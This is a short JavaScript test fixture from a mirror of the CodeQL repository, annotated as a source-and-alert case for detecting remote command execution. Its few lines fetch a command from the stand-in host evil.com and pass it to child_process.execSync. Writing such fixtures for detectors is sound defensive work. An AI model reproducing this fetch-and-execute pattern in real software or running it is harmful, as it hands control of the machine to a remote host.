mirror of
https://github.com/github/codeql.git
synced 2025-12-17 09:13:20 +01:00
9 lines
209 B
JavaScript
9 lines
209 B
JavaScript
let https = require("https"),
|
|
cp = require("child_process");
|
|
|
|
https.get("https://evil.com/getCommand", res =>
|
|
res.on("data", command => { // $ Source
|
|
cp.execSync(command); // $ Alert
|
|
})
|
|
);
|